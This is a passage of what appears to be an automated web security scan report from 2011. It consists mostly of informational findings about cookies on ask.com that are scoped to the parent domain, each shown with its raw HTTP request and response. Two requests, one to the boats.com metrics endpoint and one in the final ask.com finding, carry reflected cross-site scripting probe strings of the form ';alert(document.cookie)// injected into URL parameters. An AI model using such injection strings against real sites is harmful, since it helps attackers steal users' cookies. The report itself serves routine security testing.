GET /b/ss/deyachtworld/1/H.17/s59107670621015?AQB=1&ndh=1&t=27/0/2011%2017%3A29%3A54%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=transport_application&g=http%3A//www.boats.com/boat-transport/index.jsp%3Fsource%3Dyachtworld%26yw_country%3DUS33d06%27%253balert%28document.cookie%29//ec734b2bd35&cc=USD&c28=transport_application%3AKForm%3A%28No%20Data%20Entered%29&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_o&pev1=http%3A//www.boats.com/boat-transport/%23&pev2=Form%20Analysis&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(document.cookie)//ec734b2bd35
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 23:29:19 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A0FFE785012E5B-6000010D80001CDA[CE]; Expires=Tue, 26 Jan 2016 23:29:19 GMT; Domain=.yachtworld.com; Path=/
Location: http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015?AQB=1&pccr=true&vidn=26A0FFE785012E5B-6000010D80001CDA&&ndh=1&t=27/0/2011%2017%3A29%3A54%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=transport_application&g=http%3A//www.boats.com/boat-transport/index.jsp%3Fsource%3Dyachtworld%26yw_country%3DUS33d06%27%253balert%28document.cookie%29//ec734b2bd35&cc=USD&c28=transport_application%3AKForm%3A%28No%20Data%20Entered%29&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_o&pev1=http%3A//www.boats.com/boat-transport/%23&pev2=Form%20Analysis&AQE=1
X-C: ms-4.3.1
Expires: Wed, 26 Jan 2011 23:29:19 GMT
Last-Modified: Fri, 28 Jan 2011 23:29:19 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www108
Content-Length: 0
Content-Type: text/plain

8.8. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

user=o=0&l=dir; Domain=.ask.com; Path=/
puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.9. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
ldpt=porg=5488|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Content-Length: 93586

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...

8.10. http://www.ask.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:52 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/
Content-Length: 105683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>About Ask.com</title>
<link href="http://www.ask.com/inc/css/lib/yui/reset-fonts-grids_r2.8.css" type="text/css" rel="sty
...[SNIP]...

8.11. http://www.ask.com/about/legal/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/privacy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:53 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Content-Length: 37234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
<title>About Ask.com: Privacy Policy</title>



<!-- y
...[SNIP]...

8.12. http://www.ask.com/about/legal/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/terms

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:56 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/legal/terms HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:56 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:56 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:56 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 44305

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
<title>About Ask.com: Terms of Services</title>



<!-
...[SNIP]...

8.13. http://www.ask.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/advertise

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /advertise HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:53 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 37589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...

8.14. http://www.ask.com/ans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ans

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:09 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

8.15. http://www.ask.com/answers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:26 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:26 GMT
Content-Length: 29312
Connection: close
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:26 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:26 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>My Questions & Answers - Ask Community</title><link REL="shortcut icon" HREF="http://sp.ask.com/sh/i/a14/favicon/favicon.ico"
...[SNIP]...

8.16. http://www.ask.com/answers/000/Notification previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers/000/Notification

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjQzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:43 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/000/Notification HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

8.17. http://www.ask.com/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/homepage

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE0OjA1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage?q=&o=0&l=dir&page=1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

8.18. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjMwOjUxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:30:51 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:30:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ja-ask-dialog?src=serp&thinHeader=false&fullFlex=false HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir2a2ff'%3balert(document.cookie)//060dbcc8357
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
